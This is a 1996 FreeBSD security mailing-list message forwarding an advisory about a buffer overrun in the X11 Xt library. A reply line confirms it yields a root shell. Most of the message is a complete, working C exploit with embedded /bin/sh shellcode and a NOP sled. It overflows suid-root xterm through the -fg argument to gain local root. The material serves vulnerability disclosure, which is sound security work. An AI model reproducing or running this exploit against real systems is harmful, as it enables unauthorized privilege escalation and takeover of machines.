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Date:      	Mon, 26 Aug 1996 01:09:11 +0200 (MESZ)
From:      Stefan `Sec` Zehl <zehl@informatik.tu-muenchen.de>
To:        security@freebsd.org
Subject:   Vulnerability in the Xt library (fwd)
Message-ID:  <96Aug26.010928%2B0100mesz.398680-222%2B4828@hphalle0.informatik.tu-muenchen.de>

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I can confirm this for Freebsd 2.2-Current, it gives me a euid=0 /bin/sh

hope you can provide a fix :)

CU,
	Sec


Aleph One wrote:

There exists at least one vulnerability in the Xt library caused by a buffer
overrun that allows arbitrary code to be executed. This vulnerability
exists in the Xt library itself. As such all programs linked with it
that are suid root or can be coerced into running as root are vulnerable.
The standard example is of curse suid xterm. The vulnerability has
been confirmed under FreeBSD, Solaris, and as far as we can tell every
single other OS running all revisions of X11.

There exists a large number of places in the Xt library code where buffers
allocated on the stack are handled insecurly other than the one used on the
fallowing exploit. The Xt library is a can of worms.

The original author of this vulnerability is "b0z0 bra1n".

x86 exploit tested under FreeBSD fallows. For other x86 operating systems
play around with the offset:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET          0
#define BUFFER_SIZE             1491

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

main(int argc, char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
   "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
   "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
"\xeb\x18"
   "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
   "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";

   int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;

   if(argc>1)
        ofs=atoi(argv[1]);
   if(argc>2)
        bs=atoi(argv[2]);
   printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
        ofs, get_esp()+ofs, bs);

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, bs-strlen(execshell));
   ptr += bs-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}


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